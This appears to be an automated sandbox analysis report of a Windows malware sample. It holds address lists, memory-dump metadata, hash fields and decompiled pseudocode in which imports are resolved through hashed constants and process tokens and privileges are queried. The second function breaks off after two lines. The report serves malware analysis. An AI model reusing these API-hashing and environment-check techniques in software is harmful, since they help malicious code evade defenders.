0x10001900
0x10001907
0x10001919
0x1000192f
0x1000193a
0x1000193b
0x1000193c
0x1000193d
0x1000193e
0x10001941
0x10001945
0x10001949
0x10001950
0x10001962
0x10001978
0x10001983
0x10001984
0x10001985
0x10001986
0x1000198c
0x1000198f
0x10001991
0x1000199c
0x100019a3
0x100019ac
0x100019b4
0x100019bb
0x100019c4
0x100019cc
0x100019d3
0x100019dc
0x100019e4
0x100019eb
0x100019f4
0x100019fc
0x10001a03
0x10001a0c
0x10001a14
0x10001a1b
0x10001a24
0x10001a2c
0x10001a36
0x10001a3f
0x10001a47
0x10001a51
0x10001a5a
0x10001a62
0x10001a6c
0x10001a75
0x10001a7d
0x10001a87
0x10001a90
0x10001a98
0x10001aa2
0x10001aab
0x10001ab3
0x10001abd
0x10001ac6
0x10001ace
0x10001ad8
0x10001ae1
0x10001ae9
0x10001af3
0x10001afc
0x10001b04
0x10001b0e
0x10001b17
0x10001b1f
0x10001b26
0x10001b2f
0x10001b37
0x10001b3e
0x10001b43
0x10001b51
0x10001b55
0x10001b64
0x10001b6d
0x10001b72
0x10001b79
0x10001b7d
0x10001b81
0x10001b88
0x10001b8d
0x10001b9a
0x10001bb0
0x10001bbb
0x10001bbc
0x10001bbd
0x10001bbe
0x10001bbf
0x10001bc2
0x10001bc6
0x10001bca
0x10001bd1
0x10001be3
0x10001bf9
0x10001c04
0x10001c05
0x10001c06
0x10001c07
0x10001c08
0x10001c0b
0x10001c0f
0x10001c13
0x10001c1a
0x10001c2c
0x10001c42
0x10001c4d
0x10001c4e
0x10001c4f
0x10001c50
0x10001c51
0x10001c54
0x10001c58
0x10001c5c
0x10001c63
0x10001c75
0x10001c8b
0x10001c96
0x10001c97
0x10001c98
0x10001c99
0x10001c9a
0x10001c9d
0x10001ca0
0x10001ca1
0x10001ca2
0x10001ca9
0x10001cac
0x10001cb7
0x10001cba
0x10001cbe
0x10001cc7
0x10001ccf
0x10001cd6
0x10001cdf
0x10001ce7
0x10001cee
0x10001cf7
0x10001cff
0x10001d04
0x10001d0d
0x10001d15
0x10001d2a

Strings

g , xrefs: 100017DC

Memory Dump Source

Source File: 00000004.00000002.326004095.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.325983786.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.326199252.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.326242722.000000001001D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.326285629.000000001001F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: g
API String ID: 0-171373902
Opcode ID: 262a3ce7073f40aac282c9a725709660bc06e61c9f8afc789fdfecee9fb6a402
Instruction ID: b442155eacf7675d39859fb34eebdae8123254ffe159dd47b7877bbbb04c0330
Opcode Fuzzy Hash: 262a3ce7073f40aac282c9a725709660bc06e61c9f8afc789fdfecee9fb6a402
Instruction Fuzzy Hash: 1032C6764047059AD705DF24C852AFFB3A0EFA2388F10871DB8896A1A7FF71F985D681

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 10010754, Relevance: 1.9, Strings: 1, Instructions: 650
COMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E10010754(void* __ecx) {
				void* __esi;
				intOrPtr _t155;
				signed char* _t159;
				char _t162;
				char _t180;
				intOrPtr _t189;
				char _t190;
				intOrPtr _t196;
				intOrPtr _t201;
				char _t204;
				void* _t213;
				void* _t214;
				char _t216;
				char _t217;
				char _t224;
				char _t239;
				char _t242;
				char _t245;
				char _t248;
				char _t251;
				char _t255;
				char _t260;
				void* _t269;
				void* _t270;
				char _t272;
				char _t273;
				void* _t277;
				char _t278;
				char _t279;
				char _t283;
				intOrPtr* _t292;
				signed char _t295;
				signed char _t296;
				intOrPtr* _t321;
				intOrPtr* _t326;
				intOrPtr* _t348;
				intOrPtr* _t364;
				char _t365;
				intOrPtr* _t370;
				intOrPtr* _t373;
				intOrPtr* _t378;
				char _t383;
				char _t384;
				char _t385;
				char _t386;
				char _t387;
				char _t388;
				char _t394;
				char _t396;
				char _t402;
				char _t404;
				intOrPtr* _t405;
				signed int _t407;
				intOrPtr* _t410;
				intOrPtr* _t412;
				signed int _t414;
				void* _t415;
				void* _t416;
				char _t421;
				intOrPtr* _t424;
				void* _t426;
				intOrPtr* _t428;
				void* _t429;
				void* _t430;

				_t415 = __ecx;
				_t155 =  *0x1001d1f8;
				if(_t155 == 0x255be0d1) {
					_t155 = E100135F4(0x30);
					 *0x1001d1f8 = _t155;
				}
				if( *((char*)(_t155 + 0xb)) == 0 || _t415 != 0) {
					_t416 = _t429 + 0x48;
					E10013670(_t416, 0, 0x11c);
					_t430 = _t429 + 0xc;
					 *((intOrPtr*)(_t430 + 0x48)) = 0x11c;
					if(E10013044(0x10154545, 0x51a0195c, 0x10154545, 0x10154545) != 0) {
						_push(_t416);
						asm("int3");
						asm("int3");
					}
					_t405 =  *0x1001d1f8;
					_t159 = _t430 + 0x4c;
					_t295 =  *_t159;
					 *(_t405 + 8) = _t295;
					_t296 = _t159[4];
					 *(_t405 + 9) = _t296;
					 *((char*)(_t405 + 0xa)) = _t159[0x110];
					 *((intOrPtr*)(_t405 + 4)) =  *((intOrPtr*)(_t430 + 0x54));
					 *((char*)(_t405 + 0xc)) = 0 | _t159[0x116] != 0x00000001;
					 *_t405 = (_t296 & 0x000000ff) + ((_t295 & 0x000000ff) << 4) - 0x50;
					_t162 = E1001101C(_t405);
					 *((intOrPtr*)(_t430 + 0x198)) = 0;
					 *((char*)( *0x1001d1f8 + 0xb)) = _t162;
					_t364 = E10013044(0x8b9d0da7, 0x8335dc52, _t162, _t162);
					if(_t364 == 0) {
						L12:
						_t365 = 0;
						L13:
						 *((char*)( *0x1001d1f8 + 0x28)) = _t365;
						if( *((intOrPtr*)(E10010754(0))) >= 0x10) {
							_push(6);
							memcpy(_t430 + 0x164, 0x1001bce0, 0 << 2);
							_t430 = _t430 + 0xc;
							 *((intOrPtr*)(_t430 + 0x1c)) = 0;
							E1000F5A8(_t430 + 0x24, 0);
							_t407 = 0;
							__eflags = 0;
							do {
								E1000F84C(_t430 + 0x24, E1000F4F0(_t430 + 0x20) + 4);
								 *((intOrPtr*)(E1000F4E0(_t430 + 0x24, E1000F4F0(_t430 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t430 + 0x164 + _t407 * 4));
								_t407 = _t407 + 1;
								 *((intOrPtr*)(_t430 + 0x1c)) =  *((intOrPtr*)(_t430 + 0x1c)) + 1;
								__eflags = _t407 - 6;
							} while (_t407 < 6);
							_push(0);
							E10015558(_t430 + 0xc, _t430 + 0x1c, 0x80000002);
							E1000F678(_t430 + 0x20);
							E10015588(_t430 + 8, _t430 + 0x1c0, 0x5e9822cf);
							_t180 = E1001583C(_t430 + 4, __eflags,  *((intOrPtr*)(_t430 + 0x1c0)));
							_t408 = _t180;
							E1000DFDC(_t430 + 0x1c0);
							__eflags = _t180;
							if(_t180 != 0) {
								E10015588(_t430 + 8, _t430 + 0x1c8, 0x80c4a2b7);
								_t421 = E1001583C(_t430 + 4, __eflags,  *((intOrPtr*)(_t430 + 0x1c8)));
								E1000DFDC(_t430 + 0x1c8);
								_t408 = _t430 + 0x1d0;
								E10015588(_t430 + 8, _t430 + 0x1d0, 0xa89c042f);
								_t402 = E1001583C(_t430 + 4, __eflags,  *((intOrPtr*)(_t430 + 0x1d0)));
								E1000DFDC(_t430 + 0x1d0);
								__eflags = _t421;
								if(_t421 != 0) {
									__eflags = _t421 - 5;
									if(_t421 != 5) {
										__eflags = _t421 - 2;
										if(_t421 != 2) {
											L58:
											E1000D020(_t430 + 0xc);
											__eflags =  *((char*)(_t430 + 8));
											if( *((char*)(_t430 + 8)) == 0) {
												L65:
												_t189 = 0;
												__eflags = 0;
												 *((intOrPtr*)(_t430 + 4)) = 0;
												goto L66;
											}
											_t383 =  *((intOrPtr*)(_t430 + 4));
											__eflags = _t383;
											if(_t383 == 0) {
												L61:
												_t239 = 1;
												L63:
												__eflags = _t239;
												if(_t239 == 0) {
													E10015530(_t383);
												}
												goto L65;
											}
											__eflags = _t383 - 0xffffffff;
											if(_t383 != 0xffffffff) {
												_t239 = 0;
												__eflags = 0;
												goto L63;
											}
											goto L61;
										}
										__eflags = _t402 - 1;
										if(_t402 != 1) {
											goto L58;
										}
										E1000D020(_t430 + 0xc);
										__eflags =  *((char*)(_t430 + 8));
										if( *((char*)(_t430 + 8)) == 0) {
											L57:
											 *((intOrPtr*)(_t430 + 4)) = 0;
											_t189 = 5;
											goto L66;
										}
										_t384 =  *((intOrPtr*)(_t430 + 4));
										__eflags = _t384;
										if(_t384 == 0) {
											L53:
											_t242 = 1;
											L55:
											__eflags = _t242;
											if(_t242 == 0) {
												E10015530(_t384);
											}
											goto L57;
										}
										__eflags = _t384 - 0xffffffff;
										if(_t384 != 0xffffffff) {
											_t242 = 0;
											__eflags = 0;
											goto L55;
										}
										goto L53;
									}
									__eflags = _t402;
									if(_t402 != 0) {
										__eflags = _t402 - 1;
										if(_t402 == 1) {
											E1000D020(_t430 + 0xc);
											__eflags =  *((char*)(_t430 + 8));
											if( *((char*)(_t430 + 8)) == 0) {
												L121:
												 *((intOrPtr*)(_t430 + 4)) = 0;
												_t189 = 4;
												goto L66;
											}
											_t385 =  *((intOrPtr*)(_t430 + 4));
											__eflags = _t385;
											if(_t385 == 0) {
												L117:
												_t245 = 1;
												L119:
												__eflags = _t245;
												if(_t245 == 0) {
													E10015530(_t385);
												}
												goto L121;
											}
											__eflags = _t385 - 0xffffffff;
											if(_t385 != 0xffffffff) {
												_t245 = 0;
												__eflags = 0;
												goto L119;
											}
											goto L117;
										}
										goto L58;
									}
									E1000D020(_t430 + 0xc);
									__eflags =  *((char*)(_t430 + 8));
									if( *((char*)(_t430 + 8)) == 0) {
										L45:
										 *((intOrPtr*)(_t430 + 4)) = 0;
										_t189 = 3;
										goto L66;
									}
									_t386 =  *((intOrPtr*)(_t430 + 4));
									__eflags = _t386;
									if(_t386 == 0) {
										L41:
										_t248 = 1;
										L43:
										__eflags = _t248;
										if(_t248 == 0) {
											E10015530(_t386);
										}
										goto L45;
									}
									__eflags = _t386 - 0xffffffff;
									if(_t386 != 0xffffffff) {
										_t248 = 0;
										__eflags = 0;
										goto L43;
									}
									goto L41;
								}
								__eflags = _t402;
								if(_t402 != 0) {
									goto L58;
								}
								E1000D020(_t430 + 0xc);
								__eflags =  *((char*)(_t430 + 8));
								if( *((char*)(_t430 + 8)) == 0) {
									L35:
									 *((intOrPtr*)(_t430 + 4)) = 0;
									_t189 = 2;
									goto L66;
								}
								_t387 =  *((intOrPtr*)(_t430 + 4));
								__eflags = _t387;
								if(_t387 == 0) {
									L31:
									_t251 = 1;
									L33:
									__eflags = _t251;
									if(_t251 == 0) {
										E10015530(_t387);
									}
									goto L35;
								}
								__eflags = _t387 - 0xffffffff;
								if(_t387 != 0xffffffff) {
									_t251 = 0;
									__eflags = 0;
									goto L33;
								}
								goto L31;
							}
							E1000D020(_t430 + 0xc);
							__eflags =  *((char*)(_t430 + 8));
							if( *((char*)(_t430 + 8)) == 0) {
								L25:
								 *((intOrPtr*)(_t430 + 4)) = 0;
								_t189 = 1;
								goto L66;
							}
							_t388 =  *((intOrPtr*)(_t430 + 4));
							__eflags = _t388;
							if(_t388 == 0) {
								L21:
								_t255 = 1;
								L23:
								__eflags = _t255;
								if(_t255 == 0) {
									E10015530(_t388);
								}
								goto L25;
							}
							__eflags = _t388 - 0xffffffff;
							if(_t388 != 0xffffffff) {
								_t255 = 0;
								__eflags = 0;
								goto L23;
							}
							goto L21;
						} else {
							_t189 = 1;
							L66:
							 *((intOrPtr*)( *0x1001d1f8 + 0x24)) = _t189;
							_t190 = E10011054(0xffffffffffffffff);
							_t321 =  *0x1001d1f8;
							 *((char*)(_t321 + 0x29)) = _t190;
							 *((intOrPtr*)(_t321 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
							if( *_t321 >= 0x10) {
								__eflags = 0xffffffffffffffff;
								 *((intOrPtr*)( *0x1001d1f8 + 0x2c)) = E100110C8(0xffffffffffffffff);
								L78:
								_t370 = E10013044(0x10154545, 0xccc77b1, 0x10154545, 0x10154545);
								if(_t370 != 0) {
									 *_t370(_t430 + 0x164);
								}
								_t196 =  *0x1001d1f8;
								_t292 = _t430 + 0x178;
								_t410 = _t430 + 0x170;
								 *((short*)(_t196 + 0xe)) =  *_t292;
								 *((intOrPtr*)(_t196 + 0x10)) =  *((intOrPtr*)(_t292 - 0x10));
								 *((intOrPtr*)(_t196 + 0x14)) =  *((intOrPtr*)(_t292 - 0xc));
								 *((intOrPtr*)(_t196 + 0x18)) =  *_t410;
								 *((intOrPtr*)(_t196 + 0x1c)) =  *((intOrPtr*)(_t410 + 0x10));
								return _t196;
							}
							 *((intOrPtr*)(_t430 + 0x19c)) = 0;
							_t373 = E10013044(0x8b9d0da7, 0x8335dc52, 0x8b9d0da7, 0x8b9d0da7);
							if(_t373 == 0) {
								L74:
								_t201 =  *0x1001d1f8;
								if( *((char*)(_t201 + 0x28)) == 0) {
									 *((intOrPtr*)(_t201 + 0x2c)) = 3;
								} else {
									 *((intOrPtr*)(_t201 + 0x2c)) = 5;
								}
								goto L78;
							}
							_push(_t430 + 0x19c);
							_push(8);
							_push(0xffffffff);
							if( *_t373() == 0) {
								_t204 = E100135C8(_t408);
								__eflags = _t204;
								if(_t204 != 0) {
									goto L74;
								}
							}
							 *((intOrPtr*)(_t430 + 0x30)) =  *((intOrPtr*)(_t430 + 0x19c));
							 *((char*)(_t430 + 0x34)) = 1;
							 *((intOrPtr*)(_t430 + 0x1a4)) = 0;
							_t326 = E10013044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7);
							if(_t326 != 0) {
								_push(_t430 + 0x1a4);
								_push(0);
								_push(0);
								_push(1);
								_push( *((intOrPtr*)(_t430 + 0x1ac)));
								if( *_t326() == 0) {
									E100135C8(_t408);
								}
							}
							_t207 =  *((intOrPtr*)(_t430 + 0x1a4));
							if( *((intOrPtr*)(_t430 + 0x1a4)) != 0) {
								E1000F5A8(_t430 + 0x18c, _t207);
								_t412 = E10013044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7);
								__eflags = _t412;
								if(_t412 == 0) {
									L133:
									E1000F678(_t430 + 0x188);
									goto L72;
								}
								_t213 = E1000F4E0(_t430 + 0x18c, 0);
								_t214 = E1000F4F0(_t430 + 0x188);
								_t216 =  *_t412( *((intOrPtr*)(_t430 + 0x1ac)), 1, _t213, _t214, _t430 + 0x1a4);
								__eflags = _t216;
								if(_t216 == 0) {
									_t217 = E100135C8(_t412);
									__eflags = _t217;
									if(_t217 != 0) {
										goto L133;
									}
								}
								_t424 = E1000F4E0(_t430 + 0x18c, 0);
								E1000DF84(_t430 + 0x1b4, 0);
								 *((intOrPtr*)(_t430 + 0x1ac)) = 0;
								_t378 = E10013044(0x8b9d0da7, 0x628b2cfa, 0x8b9d0da7, 0x8b9d0da7);
								__eflags = _t378;
								if(_t378 != 0) {
									 *_t378( *_t424, _t430 + 0x1ac);
								}
								E1000DFF8(_t430 + 0x1b4,  *((intOrPtr*)(_t430 + 0x1ac)));
								_t224 = E10013044(0x10154545, 0x44fb2dcc, 0x10154545, 0x10154545);
								__eflags = _t224;
								if(_t224 != 0) {
									_push( *((intOrPtr*)(_t430 + 0x1ac)));
									asm("int3");
									asm("int3");
								}
								E1000E0A4(_t430 + 0x1b8 - 8, _t430 + 0x1b8);
								_t426 = E10014FD4( *((intOrPtr*)(_t430 + 0x1b8)), E1000E8D4( *((intOrPtr*)(_t430 + 0x1b8)), 0x7fffffff));
								E1000DFDC(_t430 + 0x1b8);
								E1000DFDC(_t430 + 0x1b0);
								E1000F678(_t430 + 0x188);
								__eflags =  *((char*)(_t430 + 0x34));
								if( *((char*)(_t430 + 0x34)) != 0) {
									E1000BB88(_t430 + 0x30);
								}
								__eflags = _t426 - 0x6df4cf7;
								if(_t426 != 0x6df4cf7) {
									goto L74;
								} else {
									 *((intOrPtr*)( *0x1001d1f8 + 0x2c)) = 6;
									goto L78;
								}
							} else {
								L72:
								if( *((char*)(_t430 + 0x34)) != 0) {
									E1000BB88(_t430 + 0x30);
								}
								goto L74;
							}
						}
					}
					_push(_t430 + 0x198);
					_push(8);
					_push(0xffffffff);
					if( *_t364() == 0) {
						_t260 = E100135C8(_t405);
						__eflags = _t260;
						if(_t260 != 0) {
							goto L12;
						}
					}
					 *((intOrPtr*)(_t430 + 0x14)) =  *((intOrPtr*)(_t430 + 0x198));
					 *((char*)(_t430 + 0x18)) = 1;
					 *((intOrPtr*)(_t430 + 0x1a0)) = 0;
					_t348 = E10013044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7);
					if(_t348 != 0) {
						_push(_t430 + 0x1a0);
						_push(0);
						_push(0);
						_push(2);
						_push( *((intOrPtr*)(_t430 + 0x1a8)));
						if( *_t348() == 0) {
							E100135C8(_t405);
						}
					}
					_t263 =  *((intOrPtr*)(_t430 + 0x1a0));
					if( *((intOrPtr*)(_t430 + 0x1a0)) != 0) {
						E1000F5A8(_t430 + 0x3c, _t263);
						_t408 = E10013044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7);
						__eflags = _t408;
						if(_t408 == 0) {
							L107:
							E1000F678(_t430 + 0x38);
							goto L10;
						}
						_t269 = E1000F4E0(_t430 + 0x3c, 0);
						_t270 = E1000F4F0(_t430 + 0x38);
						_t272 =  *_t408( *((intOrPtr*)(_t430 + 0x1a8)), 2, _t269, _t270, _t430 + 0x1a0);
						__eflags = _t272;
						if(_t272 == 0) {
							_t273 = E100135C8(_t408);
							__eflags = _t273;
							if(_t273 != 0) {
								goto L107;
							}
						}
						_t428 = E1000F4E0(_t430 + 0x3c, 0);
						 *((intOrPtr*)(_t430 + 0x1d8 - 0x30)) = 0;
						asm("movsd");
						asm("movsb");
						asm("movsb");
						_t408 = E10013044(0x8b9d0da7, 0xbdc0a291, 0x8b9d0da7, 0x8b9d0da7);
						__eflags = _t408;
						if(_t408 == 0) {
							goto L107;
						}
						_t277 = _t430 + 0x1a8;
						_t278 =  *_t408(_t277 + 0x30, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t277);
						__eflags = _t278;
						if(_t278 == 0) {
							_t279 = E100135C8(_t408);
							__eflags = _t279;
							if(_t279 != 0) {
								goto L107;
							}
						}
						_t404 =  *((intOrPtr*)(_t430 + 0x1a8));
						__eflags =  *_t428;
						if( *_t428 <= 0) {
							L101:
							__eflags = _t404;
							if(_t404 == 0) {
								L103:
								_t394 = 1;
								L105:
								__eflags = _t394;
								if(_t394 == 0) {
									E10010FF8(_t404, _t408, _t404);
								}
								goto L107;
							}
							__eflags = _t404 - 0xffffffff;
							if(_t404 != 0xffffffff) {
								_t394 = 0;
								__eflags = 0;
								goto L105;
							}
							goto L103;
						}
						_t414 = 0;
						__eflags = 0;
						do {
							_t283 = E10013044(0x8b9d0da7, 0x2ae47d4a, 0x8b9d0da7, 0x8b9d0da7);
							__eflags = _t283;
							if(_t283 == 0) {
								goto L100;
							}
							_push( *((intOrPtr*)(_t428 + 4 + _t414 * 8)));
							_push( *((intOrPtr*)(_t430 + 0x1ac)));
							asm("int3");
							asm("int3");
							__eflags = _t283;
							if(_t283 == 0) {
								goto L100;
							}
							__eflags = _t404;
							if(_t404 == 0) {
								L93:
								_t396 = 1;
								L95:
								__eflags = _t396;
								if(_t396 == 0) {
									E10010FF8(_t404, _t414, _t404);
								}
								E1000F678(_t430 + 0x38);
								__eflags =  *((char*)(_t430 + 0x18));
								if( *((char*)(_t430 + 0x18)) != 0) {
									E1000BB88(_t430 + 0x14);
								}
								_t365 = 1;
								goto L13;
							}
							__eflags = _t404 - 0xffffffff;
							if(_t404 != 0xffffffff) {
								_t396 = 0;
								__eflags = 0;
								goto L95;
							}
							goto L93;
							L100:
							_t414 = _t414 + 1;
							__eflags = _t414 -  *_t428;
						} while (_t414 <  *_t428);
						goto L101;
					}
					L10:
					if( *((char*)(_t430 + 0x18)) != 0) {
						E1000BB88(_t430 + 0x14);
					}
					goto L12;
				} else {
					return _t155;
				}
			}

0x10010763
0x10010765
0x1001076c
0x10010feb
0x10010ff1
0x10010ff1
0x10010776
0x10010782
0x1001078e
0x10010793
0x100107a0
0x100107b1
0x100107b3
0x100107b4
0x100107b5
0x100107b5
0x100107b6
0x100107ba
0x100107be
0x100107c3
0x100107c6
0x100107cc
0x100107e6
0x100107ed
0x100107f0
0x100107f3
0x100107f5
0x10010801
0x1001080e
0x1001081b
0x1001081f
0x100108ab
0x100108ab
0x100108ad
0x100108b1
0x100108bc
0x100108d2
0x100108d5
0x100108d5
0x100108d9
0x100108e2
0x100108e7
0x100108e7
0x100108e9
0x100108fa
0x1001091c
0x1001091e
0x1001091f
0x10010923
0x10010923
0x1001092c
0x10010938
0x10010941
0x10010957
0x10010967
0x1001096c
0x10010970
0x10010975
0x10010977
0x100109c7
0x100109dc
0x100109e0
0x100109e5
0x100109f6
0x10010a0b
0x10010a0f
0x10010a14
0x10010a16
0x10010a5d
0x10010a60
0x10010aae
0x10010ab1
0x10010af2
0x10010af6
0x10010afb
0x10010b00
0x10010b1f
0x10010b1f
0x10010b1f
0x10010b21
0x00000000
0x10010b21
0x10010b02
0x10010b06
0x10010b08
0x10010b0f
0x10010b0f
0x10010b15
0x10010b15
0x10010b17
0x10010b1a
0x10010b1a
0x00000000
0x10010b17
0x10010b0a
0x10010b0d
0x10010b13
0x10010b13
0x00000000
0x10010b13
0x00000000
0x10010b0d
0x10010ab3
0x10010ab6
0x00000000
0x00000000
0x10010abc
0x10010ac1
0x10010ac6
0x10010ae5
0x10010ae5
0x10010aef
0x00000000
0x10010aef
0x10010ac8
0x10010acc
0x10010ace
0x10010ad5
0x10010ad5
0x10010adb
0x10010adb
0x10010add
0x10010ae0
0x10010ae0
0x00000000
0x10010add
0x10010ad0
0x10010ad3
0x10010ad9
0x10010ad9
0x00000000
0x10010ad9
0x00000000
0x10010ad3
0x10010a62
0x10010a64
0x10010aa3
0x10010aa6
0x10010e18
0x10010e1d
0x10010e22
0x10010e41
0x10010e41
0x10010e4b
0x00000000
0x10010e4b
0x10010e24
0x10010e28
0x10010e2a
0x10010e31
0x10010e31
0x10010e37
0x10010e37
0x10010e39
0x10010e3c
0x10010e3c
0x00000000
0x10010e39
0x10010e2c
0x10010e2f
0x10010e35
0x10010e35
0x00000000
0x10010e35
0x00000000
0x10010e2f
0x00000000
0x10010aac
0x10010a6a
0x10010a6f
0x10010a74
0x10010a93
0x10010a93
0x10010a9d
0x00000000
0x10010a9d
0x10010a76
0x10010a7a
0x10010a7c
0x10010a83
0x10010a83
0x10010a89
0x10010a89
0x10010a8b
0x10010a8e
0x10010a8e
0x00000000
0x10010a8b
0x10010a7e
0x10010a81
0x10010a87
0x10010a87
0x00000000
0x10010a87
0x00000000
0x10010a81
0x10010a18
0x10010a1a
0x00000000
0x00000000
0x10010a24
0x10010a29
0x10010a2e
0x10010a4d
0x10010a4d
0x10010a57
0x00000000
0x10010a57
0x10010a30
0x10010a34
0x10010a36
0x10010a3d
0x10010a3d
0x10010a43
0x10010a43
0x10010a45
0x10010a48
0x10010a48
0x00000000
0x10010a45
0x10010a38
0x10010a3b
0x10010a41
0x10010a41
0x00000000
0x10010a41
0x00000000
0x10010a3b
0x1001097d
0x10010982
0x10010987
0x100109a6
0x100109a6
0x100109b0
0x00000000
0x100109b0
0x10010989
0x1001098d
0x1001098f
0x10010996
0x10010996
0x1001099c
0x1001099c
0x1001099e
0x100109a1
0x100109a1
0x00000000
0x1001099e
0x10010991
0x10010994
0x1001099a
0x1001099a
0x00000000
0x1001099a
0x00000000
0x100108be
0x100108c0
0x10010b25
0x10010b2a
0x10010b2d
0x10010b32
0x10010b34
0x10010b49
0x10010b4c
0x10010c1a
0x10010c22
0x10010c25
0x10010c36
0x10010c3a
0x10010c44
0x10010c44
0x10010c46
0x10010c48
0x10010c57
0x10010c63
0x10010c67
0x10010c6a
0x10010c6d
0x10010c70
0x00000000
0x10010c70
0x10010b5c
0x10010b6e
0x10010b72
0x10010bfe
0x10010bfe
0x10010c04
0x10010c0f
0x10010c06
0x10010c06
0x10010c06
0x00000000
0x10010c04
0x10010b7f
0x10010b80
0x10010b82
0x10010b88
0x10010fd7
0x10010fdc
0x10010fde
0x00000000
0x00000000
0x10010fe4
0x10010b9f
0x10010ba3
0x10010ba8
0x10010bba
0x10010bbe
0x10010bc9
0x10010bca
0x10010bcb
0x10010bcc
0x10010bce
0x10010bd9
0x10010e51
0x10010e51
0x10010bd9
0x10010bdf
0x10010be8
0x10010e63
0x10010e79
0x10010e7b
0x10010e7d
0x10010fb8
0x10010fbf
0x00000000
0x10010fbf
0x10010e8c
0x10010e9a
0x10010eb4
0x10010eb6
0x10010eb8
0x10010fc9
0x10010fce
0x10010fd0
0x00000000
0x00000000
0x10010fd2
0x10010ecc
0x10010ed7
0x10010ee6
0x10010ef8
0x10010efa
0x10010efc
0x10010f09
0x10010f09
0x10010f19
0x10010f2a
0x10010f2f
0x10010f31
0x10010f33
0x10010f3a
0x10010f3b
0x10010f3b
0x10010f47
0x10010f68
0x10010f71
0x10010f7d
0x10010f89
0x10010f8e
0x10010f93
0x10010f99
0x10010f99
0x10010f9e
0x10010fa4
0x00000000
0x10010faa
0x10010fac
0x00000000
0x10010fac
0x10010bee
0x10010bee
0x10010bf3
0x10010bf9
0x10010bf9
0x00000000
0x10010bf3
0x10010be8
0x100108bc
0x1001082c
0x1001082d
0x1001082f
0x10010835
0x10010e02
0x10010e07
0x10010e09
0x00000000
0x00000000
0x10010e0f
0x1001084c
0x10010850
0x10010855
0x10010867
0x1001086b
0x10010876
0x10010877
0x10010878
0x10010879
0x1001087b
0x10010886
0x10010c7e
0x10010c7e
0x10010886
0x1001088c
0x10010895
0x10010c8d
0x10010ca3
0x10010ca5
0x10010ca7
0x10010dd8
0x10010ddc
0x00000000
0x10010ddc
0x10010cb3
0x10010cbe
0x10010cd8
0x10010cda
0x10010cdc
0x10010df4
0x10010df9
0x10010dfb
0x00000000
0x00000000
0x10010dfd
0x10010ced
0x10010cfb
0x10010d02
0x10010d03
0x10010d04
0x10010d16
0x10010d18
0x10010d1a
0x00000000
0x00000000
0x10010d22
0x10010d3d
0x10010d3f
0x10010d41
0x10010de6
0x10010deb
0x10010ded
0x00000000
0x00000000
0x10010def
0x10010d47
0x10010d4e
0x10010d52
0x10010dbd
0x10010dbd
0x10010dbf
0x10010dc6
0x10010dc6
0x10010dcc
0x10010dcc
0x10010dce
0x10010dd3
0x10010dd3
0x00000000
0x10010dce
0x10010dc1
0x10010dc4
0x10010dca
0x10010dca
0x00000000
0x10010dca
0x00000000
0x10010dc4
0x10010d54
0x10010d54
0x10010d56
0x10010d62
0x10010d67
0x10010d69
0x00000000
0x00000000
0x10010d6b
0x10010d6f
0x10010d76
0x10010d77
0x10010d78
0x10010d7a
0x00000000
0x00000000
0x10010d7c
0x10010d7e
0x10010d85
0x10010d85
0x10010d8b
0x10010d8b
0x10010d8d
0x10010d92
0x10010d92
0x10010d9b
0x10010da0
0x10010da5
0x10010dab
0x10010dab
0x10010db0
0x00000000
0x10010db0
0x10010d80
0x10010d83
0x10010d89
0x10010d89
0x00000000
0x10010d89
0x00000000
0x10010db7
0x10010db7
0x10010db8
0x10010db8
0x00000000
0x10010d56
0x1001089b
0x100108a0
0x100108a6
0x100108a6
0x00000000
0x10010c7d
0x10010c7d
0x10010c7d

Strings

J}*, xrefs: 10010D5B

Memory Dump Source

Source File: 00000004.00000002.326004095.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.325983786.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.326199252.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.326242722.000000001001D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.326285629.000000001001F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: J}*
API String ID: 0-3566034359
Opcode ID: 3de6d7cef0cdc59b9ad438c61b36141e383f1e79743cdaae7623d9e163d39288
Instruction ID: 2d0b7547684741a8baa3a0fbe14fb8abeb41ea5cf6ce277a40cb2789471ff98d
Opcode Fuzzy Hash: 3de6d7cef0cdc59b9ad438c61b36141e383f1e79743cdaae7623d9e163d39288
Instruction Fuzzy Hash: 6B22D134708341AAE760DB20C851BAF77E9EF85384F51892DF8C99F196DBB0E885C752

Uniqueness

Uniqueness Score: -1.00%

Function 1000A52C, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E1000A52C(signed int* __ecx, void* __eflags) {
				void* __esi;
				void* __ebp;
				void* _t182;
				signed int _t183;
				signed int* _t188;
				void* _t198;
				void* _t199;
				void* _t228;
				void* _t229;
				void* _t242;
				void* _t243;
				void* _t251;
				signed int* _t271;
				void* _t282;
				void* _t284;
				void* _t285;
				void* _t296;
				signed int* _t308;
				void* _t324;
				signed int _t398;
				signed int _t402;
				intOrPtr* _t403;
				intOrPtr* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				void* _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t419;
				void* _t420;
				signed int _t421;
				void* _t422;
				signed int _t424;
				signed int _t429;
				signed int _t433;
				signed int _t434;
				signed int _t437;
				intOrPtr* _t439;

				_t308 = __ecx;
				 *(_t439 + 0x78) = 0;
